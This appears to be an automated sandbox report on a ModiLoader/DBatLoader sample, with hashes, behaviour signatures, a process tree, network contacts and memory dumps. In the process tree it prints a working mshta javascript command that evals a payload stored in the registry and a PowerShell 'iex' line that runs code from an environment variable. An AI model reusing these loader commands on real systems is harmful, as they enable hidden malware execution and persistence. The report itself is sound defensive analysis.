Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/09/2024, 06:50 UTC

General

  • Target

    f4f8bdef1fcc6271e430ac06a14e7fb8.exe

  • Size

    408KB

  • MD5

    f4f8bdef1fcc6271e430ac06a14e7fb8

  • SHA1

    ee8717fefe44c90cdd41ff52fd3402a565c3986a

  • SHA256

    b2e580936468414e204e9da4fd5c0b2b5719c3a6af5bb2796d29e061cfa872cc

  • SHA512

    601dae6fc4cfc6215aa7ac79d6ad4ca4004d699e576facd03c63a27ef89592739f10b9313b4c2193cc1ad0872d836030208facf1b50a7263a7ba47dccce15478

  • SSDEEP

    6144:IUqmsjhG9pJ8NU8Z1+3iFLs+4MrQLhElL9nZ0p5Vf0Wuk0d4ohXyulBiJ2EE:LajhG9pJmN4e5LIQZ0fVfMHituz02n

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 51 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f4f8bdef1fcc6271e430ac06a14e7fb8.exe
    "C:\Users\Admin\AppData\Local\Temp\f4f8bdef1fcc6271e430ac06a14e7fb8.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    PID:1716
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:dte0uI9urD="sxVUm";UX73=new%20ActiveXObject("WScript.Shell");IhRsdGd4m9="TOViQ";U3Fhp=UX73.RegRead("HKLM\\software\\Wow6432Node\\fz9aib\\su9n0BYHUO");eqKi3f7VJ="7";eval(U3Fhp);LLybY6sVZ="VG1";
    1⤵
    • Process spawned unexpected child process
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ipnw
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Adds policy Run key to start application
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Adds Run key to start application
        • Maps connected drives based on registry
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1760

Network

  • flag-pt
    DNS
    regsvr32.exe
    Remote address:
    13.225.12.24:80
    Response
    HTTP/1.1 400 Bad Request
    Server: CloudFront
    Date: Thu, 26 Sep 2024 06:51:36 GMT
    Content-Type: text/html
    Content-Length: 915
    Connection: close
    X-Cache: Error from cloudfront
    Via: 1.1 ba0403c0b1ff5c9871fb8f37478035a2.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: LIS50-C1
    X-Amz-Cf-Id: AkZESjawRFyhBP9lszeE3Lxb3YMGKc1jJFr3WhDK9RNSjFH8zA8THQ==
  • flag-at
    DNS
    regsvr32.exe
    Remote address:
    84.113.68.107:80
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.24.0
    Date: Thu, 26 Sep 2024 06:51:37 GMT
    Content-Type: text/html
    Content-Length: 157
    Connection: close
  • flag-pt
    POST
    http://13.225.12.24/
    regsvr32.exe
    Remote address:
    13.225.12.24:80
    Request
    POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 13.225.12.24
    Content-Length: 460
    Cache-Control: no-cache
    Response
    HTTP/1.1 403 Forbidden
    Server: CloudFront
    Date: Thu, 26 Sep 2024 06:51:39 GMT
    Content-Type: text/html
    Content-Length: 915
    Connection: keep-alive
    X-Cache: Error from cloudfront
    Via: 1.1 e7a4ac068ceee8f5f56dae98493e3cc0.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: LIS50-C1
    X-Amz-Cf-Id: jKIhC71CzJk5kpz75rHg-1hTjZkYJvwvU4iX3F_JZCr7OC7tDJ2fZA==
  • flag-pt
    POST
    http://13.225.12.24/
    regsvr32.exe
    Remote address:
    13.225.12.24:80
    Request
    POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 13.225.12.24
    Content-Length: 440
    Cache-Control: no-cache
    Response
    HTTP/1.1 403 Forbidden
    Server: CloudFront
    Date: Thu, 26 Sep 2024 06:52:24 GMT
    Content-Type: text/html
    Content-Length: 915
    Connection: keep-alive
    X-Cache: Error from cloudfront
    Via: 1.1 e7a4ac068ceee8f5f56dae98493e3cc0.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: LIS50-C1
    X-Amz-Cf-Id: ORK-wHlpzcP2uae7cCxk0sV2mdJyh8hmWjBc1oUH-kkIWm1NSZZDJg==
  • flag-pt
    POST
    http://13.225.12.24/
    regsvr32.exe
    Remote address:
    13.225.12.24:80
    Request
    POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 13.225.12.24
    Content-Length: 432
    Cache-Control: no-cache
    Response
    HTTP/1.1 403 Forbidden
    Server: CloudFront
    Date: Thu, 26 Sep 2024 06:53:09 GMT
    Content-Type: text/html
    Content-Length: 915
    Connection: keep-alive
    X-Cache: Error from cloudfront
    Via: 1.1 e7a4ac068ceee8f5f56dae98493e3cc0.cloudfront.net (CloudFront)
    X-Amz-Cf-Pop: LIS50-C1
    X-Amz-Cf-Id: 6F7tAeh7YJOLDRGGBpWr-v8HfPVMRiE5hKw6dkuTO_WaddHs8gpX5g==
  • 50.134.246.92:80
    regsvr32.exe
    52 B
    1
  • 196.186.97.28:443
    regsvr32.exe
    104 B
    80 B
    2
    2
  • 30.224.53.24:80
    regsvr32.exe
    52 B
    1
  • 13.225.12.24:80
    http
    regsvr32.exe
    289 B
    1.5kB
    5
    5

    HTTP Response

    400
  • 182.253.121.77:8080
    regsvr32.exe
    52 B
    1
  • 84.113.68.107:80
    http
    regsvr32.exe
    362 B
    481 B
    6
    4

    HTTP Response

    400
  • 80.2.162.91:443
    regsvr32.exe
    52 B
    1
  • 159.173.30.113:80
    regsvr32.exe
    52 B
    1
  • 29.63.121.60:80
    regsvr32.exe
    52 B
    1
  • 13.225.12.24:80
    http://13.225.12.24/
    http
    regsvr32.exe
    2.8kB
    5.3kB
    9
    6

    HTTP Request

    POST http://13.225.12.24/

    HTTP Response

    403

    HTTP Request

    POST http://13.225.12.24/

    HTTP Response

    403

    HTTP Request

    POST http://13.225.12.24/

    HTTP Response

    403
  • 73.201.171.229:80
    regsvr32.exe
    52 B
    1
  • 182.213.220.52:8080
    regsvr32.exe
    52 B
    1
  • 32.19.176.107:80
    regsvr32.exe
    52 B
    1
  • 170.56.83.210:80
    regsvr32.exe
    52 B
    1
  • 29.45.214.247:80
    regsvr32.exe
    52 B
    1
  • 63.152.76.121:80
    regsvr32.exe
    52 B
    1
  • 130.84.5.230:80
    regsvr32.exe
    52 B
    1
  • 145.117.244.189:80
    regsvr32.exe
    52 B
    1
  • 214.139.18.244:80
    regsvr32.exe
    52 B
    1
  • 62.161.76.7:80
    regsvr32.exe
    52 B
    1
  • 94.10.153.81:80
    regsvr32.exe
    52 B
    1
  • 17.78.64.143:80
    regsvr32.exe
    52 B
    1
  • 11.88.10.173:80
    regsvr32.exe
    52 B
    1
  • 164.203.250.130:80
    regsvr32.exe
    52 B
    1
  • 99.204.22.113:80
    regsvr32.exe
    52 B
    1
  • 88.144.191.220:80
    regsvr32.exe
    52 B
    1
  • 199.135.179.11:80
    regsvr32.exe
    52 B
    1
  • 14.157.104.89:80
    regsvr32.exe
    52 B
    1
  • 47.143.65.171:80
    regsvr32.exe
    52 B
    1
  • 169.65.16.244:80
    regsvr32.exe
    52 B
    1
  • 5.96.146.45:8080
    regsvr32.exe
    52 B
    1
  • 75.149.21.212:80
    regsvr32.exe
    52 B
    1
  • 58.109.70.77:80
    regsvr32.exe
    52 B
    1
  • 107.251.133.241:80
    regsvr32.exe
    52 B
    1
  • 169.159.254.54:80
    regsvr32.exe
    52 B
    1
  • 52.242.147.137:80
    regsvr32.exe
    52 B
    1
  • 53.193.243.113:80
    regsvr32.exe
    52 B
    1
  • 57.51.71.66:80
    regsvr32.exe
    52 B
    1
  • 49.110.90.130:80
    regsvr32.exe
    52 B
    1
  • 158.215.37.241:80
    regsvr32.exe
    52 B
    1
  • 108.179.238.131:80
    regsvr32.exe
    52 B
    1
  • 36.199.38.99:8080
    regsvr32.exe
    52 B
    1
  • 125.118.221.89:80
    regsvr32.exe
    52 B
    1
  • 14.51.86.243:80
    regsvr32.exe
    52 B
    1
  • 82.145.131.63:80
    regsvr32.exe
    52 B
    1
  • 129.244.201.216:80
    regsvr32.exe
    52 B
    1
  • 12.202.193.26:80
    regsvr32.exe
    52 B
    1
  • 16.11.57.244:80
    regsvr32.exe
    52 B
    1
  • 109.27.215.104:80
    regsvr32.exe
    52 B
    1
  • 154.109.214.43:80
    regsvr32.exe
    52 B
    1
  • 163.19.113.29:80
    regsvr32.exe
    52 B
    1
  • 84.181.38.146:80
    regsvr32.exe
    52 B
    1
  • 85.139.178.16:80
    regsvr32.exe
    52 B
    1
  • 139.244.103.2:443
    regsvr32.exe
    52 B
    1
  • 22.58.57.173:80
    regsvr32.exe
    52 B
    1
  • 44.93.81.2:80
    regsvr32.exe
    52 B
    1
  • 98.81.97.135:80
    regsvr32.exe
    52 B
    1
  • 130.77.219.190:80
    regsvr32.exe
    52 B
    1
  • 140.55.234.130:80
    regsvr32.exe
    52 B
    1
  • 20.7.33.231:80
    regsvr32.exe
    52 B
    1
  • 60.85.163.93:80
    regsvr32.exe
    52 B
    1
  • 173.114.59.133:443
    regsvr32.exe
    52 B
    1
  • 51.234.151.144:80
    regsvr32.exe
    52 B
    1
  • 133.179.118.188:80
    regsvr32.exe
    52 B
    1
  • 197.134.130.182:80
    regsvr32.exe
    52 B
    1
  • 37.188.116.163:443
    regsvr32.exe
    52 B
    1
  • 217.187.191.203:80
    regsvr32.exe
    52 B
    1
  • 22.104.246.105:80
    regsvr32.exe
    52 B
    1
  • 182.150.64.8:80
    regsvr32.exe
    52 B
    1
  • 155.190.112.190:80
    regsvr32.exe
    52 B
    1
  • 41.130.166.62:80
    regsvr32.exe
    52 B
    1
  • 112.251.170.41:80
    regsvr32.exe
    52 B
    1
  • 193.73.89.163:80
    regsvr32.exe
    52 B
    1
  • 175.231.71.80:80
    regsvr32.exe
    52 B
    1
  • 74.248.154.34:8080
    regsvr32.exe
    52 B
    1
  • 37.12.61.37:8080
    regsvr32.exe
    52 B
    1
  • 60.167.200.38:8080
    regsvr32.exe
    52 B
    1
  • 200.38.67.230:8080
    regsvr32.exe
    52 B
    1
  • 132.39.134.2:80
    regsvr32.exe
    52 B
    1
  • 148.72.150.179:80
    regsvr32.exe
    52 B
    1
  • 10.165.77.179:8080
    regsvr32.exe
    52 B
    1
  • 30.73.64.186:80
    regsvr32.exe
    52 B
    1
  • 106.92.168.167:80
    regsvr32.exe
    52 B
    1
  • 67.128.199.196:80
    regsvr32.exe
    52 B
    1
  • 187.221.255.250:80
    regsvr32.exe
    52 B
    1
  • 99.141.54.110:80
    regsvr32.exe
    52 B
    1
  • 126.252.138.9:80
    regsvr32.exe
    52 B
    1
  • 206.64.2.116:8080
    regsvr32.exe
    52 B
    1
  • 75.42.149.117:80
    regsvr32.exe
    52 B
    1
  • 140.224.133.158:80
    regsvr32.exe
    52 B
    1
  • 119.13.85.60:80
    regsvr32.exe
    104 B
    80 B
    2
    2
  • 5.233.224.224:80
    regsvr32.exe
    52 B
    1
  • 211.150.53.211:8080
    regsvr32.exe
    52 B
    1
  • 188.116.205.105:80
    regsvr32.exe
    52 B
    1
  • 144.203.131.183:80
    regsvr32.exe
    52 B
    1
  • 205.104.220.67:80
    regsvr32.exe
    52 B
    1
  • 39.110.102.111:80
    regsvr32.exe
    52 B
    1
  • 13.135.148.64:80
    regsvr32.exe
    52 B
    1
  • 12.154.53.37:80
    regsvr32.exe
    52 B
    1
  • 45.224.2.239:80
    regsvr32.exe
    52 B
    1
  • 124.13.139.54:80
    regsvr32.exe
    52 B
    1
  • 175.159.223.123:80
    regsvr32.exe
    52 B
    1
  • 118.96.87.148:8080
    regsvr32.exe
    104 B
    80 B
    2
    2
  • 138.58.187.233:80
    regsvr32.exe
    52 B
    1
  • 136.21.48.19:80
    regsvr32.exe
    52 B
    1
  • 104.175.148.204:80
    regsvr32.exe
    52 B
    1
  • 147.18.183.111:80
    regsvr32.exe
    52 B
    1
  • 75.52.227.146:80
    regsvr32.exe
    52 B
    1
  • 120.179.177.4:80
    regsvr32.exe
    52 B
    1
  • 43.141.38.46:80
    regsvr32.exe
    52 B
    1
  • 14.223.247.123:80
    regsvr32.exe
    52 B
    1
  • 118.248.88.76:443
    regsvr32.exe
    52 B
    1
  • 148.69.49.57:80
    regsvr32.exe
    52 B
    1
  • 17.18.234.107:80
    regsvr32.exe
    52 B
    1
  • 90.173.123.230:80
    regsvr32.exe
    52 B
    1
  • 212.180.186.191:80
    regsvr32.exe
    52 B
    1
  • 52.25.128.207:80
    regsvr32.exe
    52 B
    1
  • 12.52.102.38:80
    regsvr32.exe
    52 B
    1
  • 4.122.218.2:80
    regsvr32.exe
    52 B
    1
  • 209.135.133.244:80
    regsvr32.exe
    52 B
    1
  • 220.40.38.218:443
    regsvr32.exe
    52 B
    1
  • 94.90.27.170:8080
    regsvr32.exe
    52 B
    1
  • 107.158.241.143:80
    regsvr32.exe
    52 B
    1
  • 161.140.233.26:80
    regsvr32.exe
    52 B
    1
  • 157.36.38.150:80
    regsvr32.exe
    52 B
    1
  • 135.70.185.135:80
    regsvr32.exe
    52 B
    1
  • 213.232.31.37:80
    regsvr32.exe
    52 B
    1
  • 10.212.238.8:80
    regsvr32.exe
    52 B
    1
  • 105.211.94.135:80
    regsvr32.exe
    52 B
    1
  • 168.115.63.59:80
    regsvr32.exe
    52 B
    1
  • 34.141.213.36:80
    regsvr32.exe
    52 B
    1
  • 84.24.139.235:443
    regsvr32.exe
    104 B
    80 B
    2
    2
  • 218.74.231.214:80
    regsvr32.exe
    52 B
    1
  • 27.146.144.128:80
    regsvr32.exe
    52 B
    1
  • 72.13.73.168:80
    regsvr32.exe
    52 B
    1
  • 57.225.152.48:80
    regsvr32.exe
    52 B
    1
  • 58.69.169.71:80
    regsvr32.exe
    52 B
    1
  • 204.62.120.161:80
    regsvr32.exe
    52 B
    1
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/588-77-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-29-0x0000000000F20000-0x0000000000F27000-memory.dmp

    Filesize

    28KB

  • memory/588-80-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-78-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-58-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-59-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-61-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-62-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-65-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-66-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-67-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-69-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-70-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-71-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-72-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-47-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-45-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-73-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-74-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-57-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-75-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-32-0x0000000000F20000-0x0000000000F27000-memory.dmp

    Filesize

    28KB

  • memory/588-33-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-34-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-35-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-37-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-38-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-40-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-44-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-46-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-76-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-39-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-64-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-41-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-42-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-63-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/588-68-0x00000000001A0000-0x0000000000260000-memory.dmp

    Filesize

    768KB

  • memory/1716-19-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-13-0x0000000000050000-0x0000000000110000-memory.dmp

    Filesize

    768KB

  • memory/1716-2-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-3-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-4-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-5-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-6-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-16-0x0000000000050000-0x0000000000110000-memory.dmp

    Filesize

    768KB

  • memory/1716-0-0x00000000026B0000-0x0000000002830000-memory.dmp

    Filesize

    1.5MB

  • memory/1716-1-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-7-0x00000000026B0000-0x0000000002830000-memory.dmp

    Filesize

    1.5MB

  • memory/1716-8-0x0000000000260000-0x0000000000261000-memory.dmp

    Filesize

    4KB

  • memory/1716-20-0x0000000000400000-0x000000000046A000-memory.dmp

    Filesize

    424KB

  • memory/1716-9-0x0000000000400000-0x000000000046A000-memory.dmp

    Filesize

    424KB

  • memory/1716-14-0x0000000000050000-0x0000000000110000-memory.dmp

    Filesize

    768KB

  • memory/1716-15-0x0000000000050000-0x0000000000110000-memory.dmp

    Filesize

    768KB

  • memory/1716-12-0x0000000000050000-0x0000000000110000-memory.dmp

    Filesize

    768KB

  • memory/1716-11-0x0000000000050000-0x0000000000110000-memory.dmp

    Filesize

    768KB

  • memory/1760-54-0x00000000000F0000-0x00000000001B0000-memory.dmp

    Filesize

    768KB

  • memory/1760-51-0x00000000000F0000-0x00000000001B0000-memory.dmp

    Filesize

    768KB

  • memory/1760-56-0x00000000000F0000-0x00000000001B0000-memory.dmp

    Filesize

    768KB

  • memory/1760-55-0x00000000000F0000-0x00000000001B0000-memory.dmp

    Filesize

    768KB

  • memory/1760-52-0x00000000000F0000-0x00000000001B0000-memory.dmp

    Filesize

    768KB

  • memory/1760-53-0x00000000000F0000-0x00000000001B0000-memory.dmp

    Filesize

    768KB

  • memory/2792-27-0x00000000061F0000-0x00000000062B0000-memory.dmp

    Filesize

    768KB

  • memory/2792-30-0x00000000061F0000-0x00000000062B0000-memory.dmp

    Filesize

    768KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.